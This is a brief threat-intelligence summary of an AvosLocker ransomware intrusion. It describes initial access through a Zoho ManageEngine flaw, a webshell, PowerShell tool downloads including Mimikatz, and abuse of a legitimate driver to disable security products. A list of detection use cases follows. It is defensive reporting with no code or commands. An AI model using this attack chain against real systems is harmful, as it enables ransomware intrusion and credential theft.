May 10, 2022

AvosLocker Infection with Abused Driver

Industry: N/A | Level: Tactical | Source: TrendMicro

Trend Micro observed a AvosLocker infection chain deployed within the US abusing a legitimate Windows driver for defense evasion and to disable security defenses. Initial access from the attack leveraged a vulnerability in Zoho ManageEngine Service Desk Plus (telemetry didn’t identify the exact CVE used) to upload a webshell. Following command and control activity mshta.exe was leveraged to execute the attacker’s HTA file spawning a PowerShell script. Discovery activity for system information was executed along with PowerShell downloads of attacker tools including AnyDeskMSI, Mimikatz, Nmap, PDQ deploy, Netscan, and the creation of an administrator account. A legitimate driver, Aswarpot.sys was utilized to disable security products also from a PowerShell script to stop services. Through the attack, the attackers had attempted to copy a number of their tools including Mimikatz and Impacket, however efforts were blocked. NMap was used by the attacker to identify vulnerable Log4j hosts. Lastly, using the deployment tool PDQ, a batch script was launched to multiple hosts on the victim network.

  • Anvilogic Scenario: AvosLocker Infection with Abused Driver
  • Anvilogic Use Cases:
    • Potential Web Shell
    • MSHTA.exe execution
    • Common Reconnaissance Commands
    • Invoke-WebRequest Command
    • MSIExec Install MSI File
    • Create/Add Local/Domain User
    • Service Stop Commands
    • Windows Copy Files
    • Driver as Command Parameter
    • Mimikatz
    • Wscript/Cscript Execution
    • Impacket/Empire’s WMIExec